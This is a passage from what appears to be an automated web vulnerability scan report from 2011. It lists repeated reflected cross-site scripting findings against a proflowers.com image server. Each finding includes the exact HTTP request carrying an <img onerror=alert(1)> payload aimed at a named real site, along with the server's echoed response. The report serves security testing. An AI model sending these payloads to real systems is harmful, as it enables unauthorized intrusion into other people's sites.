Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img src=a onerror=alert(1)>5763a4a3885

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6 was submitted in the REST URL parameter 9. This input was echoed as 74452<img src=a onerror=alert(1)>3add74ea4c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img src=a onerror=alert(1)>3add74ea4c6

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20 was submitted in the REST URL parameter 9. This input was echoed as 9fe05<img src=a onerror=alert(1)>4969de73a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:28 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img src=a onerror=alert(1)>4969de73a20

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33 was submitted in the REST URL parameter 9. This input was echoed as 4fef5<img src=a onerror=alert(1)>efadcde1f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img src=a onerror=alert(1)>efadcde1f33

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f was submitted in the REST URL parameter 9. This input was echoed as c2ba5<img src=a onerror=alert(1)>fbc47c0020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img src=a onerror=alert(1)>fbc47c0020f

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0 was submitted in the REST URL parameter 9. This input was echoed as ea72b<img src=a onerror=alert(1)>f25cd72b5d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img src=a onerror=alert(1)>f25cd72b5d0

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73 was submitted in the REST URL parameter 9. This input was echoed as db8a2<img src=a onerror=alert(1)>dc2c61a3c73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img src=a onerror=alert(1)>dc2c61a3c73

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b was submitted in the REST URL parameter 9. This input was echoed as 5add8<img src=a onerror=alert(1)>51d9c6eb19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img src=a onerror=alert(1)>51d9c6eb19b

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6 was submitted in the REST URL parameter 9. This input was echoed as a996e<img src=a onerror=alert(1)>05540ad9da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img src=a onerror=alert(1)>05540ad9da6

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f was submitted in the REST URL parameter 9. This input was echoed as f94e9<img src=a onerror=alert(1)>2cc41beea4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img src=a onerror=alert(1)>2cc41beea4f

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d was submitted in the REST URL parameter 9. This input was echoed as 75728<img src=a onerror=alert(1)>1d0b0a9d30d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img src=a onerror=alert(1)>1d0b0a9d30d

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567 was submitted in the REST URL parameter 9. This input was echoed as b7dea<img src=a onerror=alert(1)>38121d80567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img src=a onerror=alert(1)>38121d80567

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd was submitted in the REST URL parameter 9. This input was echoed as 874d0<img src=a onerror=alert(1)>5db3fd9eabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img src=a onerror=alert(1)>5db3fd9eabd

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf was submitted in the REST URL parameter 9. This input was echoed as 494e2<img src=a onerror=alert(1)>b57ae1753bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:55 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img src=a onerror=alert(1)>b57ae1753bf

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3 was submitted in the REST URL parameter 9. This input was echoed as c5572<img src=a onerror=alert(1)>cbdab6a22f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img src=a onerror=alert(1)>cbdab6a22f3

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 34857<img%20src%3da%20onerror%3dalert(1)>40952913b8 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 34857<img src=a onerror=alert(1)>40952913b8.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img%20src%3da%20onerror%3dalert(1)>40952913b8?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img src=a onerror=alert(1)>40952913b8

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF

Issue detail

